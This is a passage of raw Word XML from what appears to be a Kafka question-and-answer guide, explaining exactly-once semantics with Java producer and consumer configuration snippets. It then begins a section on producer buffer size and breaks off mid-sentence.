          <w:numId w:val="148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roducer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C20A59" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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Enable </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotency</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set acks=all and enable.idempotence=true to prevent duplicate messages due to retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3913B3E7" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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Use </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Set transactional.id and manage the transaction lifecycle using beginTransaction(), commitTransaction(), and abortTransaction() to ensure atomicity of multiple messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E967E7" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148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Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C43F197" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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Configure the consumer with </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isolation.level=read_committed</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to only process committed messages and avoid consuming incomplete or duplicate messages from uncommitted transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0598248C" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="148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mmit offsets only after processing the messages successfully to avoid re-processing in case of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEB78C" w14:textId="77777777" w:rsidR="00092929"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500402C">
          <v:rect id="_x0000_i3189" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0794418A" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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Example Code Snippets for EOS Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA31024" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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Producer Configuration for EOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53AF1A15"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erties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F886BC5"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s.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9B6418"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s.put("acks", "all");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775BCC8D"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s.put("enable.idempotence", "true"); // Enable idempotency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C32347"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s.put("key.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D1D8E"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s.put("value.serializer", "org.apache.kafka.common.serialization.StringSerializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D3A45B"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s.put("transactional.id", "txn-1"); // Enable transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5513BE" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2DE35450"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Producer&lt;String, String&gt; producer = new KafkaProducer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0526574F" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF027CD"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Start transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A339C7E"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ducer.beginTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09077062"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ry {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6F1493"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producer.send(new ProducerRecord&lt;&gt;("topic", "key", "value"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975355A"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 Commit transaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108C918B"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producer.commitTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB83EC9"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catch (ProducerFencedException | OutOfOrderSequenceException | AuthorizationException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664D952F"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 fatal errors, may not proceed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49612921"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producer.close();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F73B6E6"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catch (KafkaException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053C5C37"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 transient errors, may be retried</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AA6878"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producer.abortTransaction();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F76B02A"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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67511CBD" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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lastRenderedPageBreak/>
        <w:t>Consumer Configuration for EOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC86490"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erties props = new Properties();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC6C359"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s.put("bootstrap.servers", "localhost:9092");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134121C6"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s.put("group.id", "group1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B966E5"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s.put("enable.auto.commit", "false");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AD415A"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s.put("isolation.level", "read_committed"); // Read only committed messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB0CB38"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s.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55712605"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s.put("value.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CC5F43" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B6F782F"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Consumer&lt;String, String&gt; consumer = new KafkaConsumer&lt;&gt;(props);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E62A42D"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sumer.subscribe(Collections.singletonList("topic"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19412AFE" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="741B012D"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hile (true) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B09104F"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sumerRecords&lt;String, String&gt; records = consumer.poll(Duration.ofMillis(100));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C3955F"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for (ConsumerRecord&lt;String, String&gt; record : records) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B461BDB"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 Process message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA758D5"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System.out.println(record.value());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E07A6AB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2691A5F2"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    consumer.commitSync(); // Commit offsets after processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C97F4C1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9560AA" w14:textId="77777777" w:rsidR="00092929"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5AAD4D1">
          <v:rect id="_x0000_i3190" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79AA1758" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4E9703"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Exactly-Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Kafka provides a powerful guarantee for ensuring the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reliable processing of messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without duplicates or data loss. This feature is implemented through </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent producers</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transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring that both producers and consumers maintain strong consistency even in the event of failures or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04144D"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By configuring Kafka producers and consumers appropriately (with acks=all, enable.idempotence=true, transactional.id, and isolation.level=read_committed), developers can implement systems that need </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>critical data integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>—such as financial transactions, order processing, and event sourcing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068B8905" w14:textId="77777777" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929"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EOS is essential for building </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>robust, high-integrity</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data pipelines in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>distributed systems</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, making it one of the core features for Kafka when data consistency is crucial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DE940E" w14:textId="509BB41C"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100F9ED">
          <v:rect id="_x0000_i3191" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E2B20D" w14:textId="502F17B2" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00E3566C" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="802" w:name="_Toc196308282"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the impact of Kafka's producer buffer size on message delivery</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="802"/>
    </w:p>
    <w:p w14:paraId="496A1564" w14:textId="7ED3D468" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Impact of Kafka's Producer Buffer Size on Message Delivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3742D" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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s </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>producer buffer size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> plays a critical role in how efficiently messages are sent to Kafka brokers and impacts message delivery in several ways. The buffer size affects the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>performance</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latency</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reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364C8378" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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producers maintain an </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>in-memory buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that stores messages before they are sent to the Kafka broker. The size of this buffer can be configured using the buffer.memory parameter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305C5103" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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Here’s how the producer buffer size impacts message delivery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609C9F54" w14:textId="77777777" w:rsidR="00495D8C"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281EBE9">
          <v:rect id="_x0000_i3192" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73993F0A" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C"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ey Factors Affected by Producer Buffer Size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5914678E" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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essage Batching and Throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED5956A" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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uffer size</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly influences how many messages can be batched together before being sent to the Kafka broker. Larger buffer sizes allow the producer to accumulate more messages, resulting in </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger batches</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D1F3C0" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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Larger batches reduce </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>network overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> because fewer requests are sent to the broker for a larger number of messages, leading to higher </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>throughput</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80EA7D" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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f the buffer size is too small, the producer may send smaller batches more frequently, potentially increasing network traffic and decreasing overall throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB079CE" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14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roducer Performance</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3D96C0" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>larger buffer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> allows the producer to buffer more data, increasing its ability to produce messages at higher rates. It can continue to produce messages even if the broker is temporarily slow to respond.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CCFF18" w14:textId="77777777" w:rsidR="00495D8C" w:rsidRPr="0003272F" w:rsidRDefault="00495D8C" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="14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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Conversely, a </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
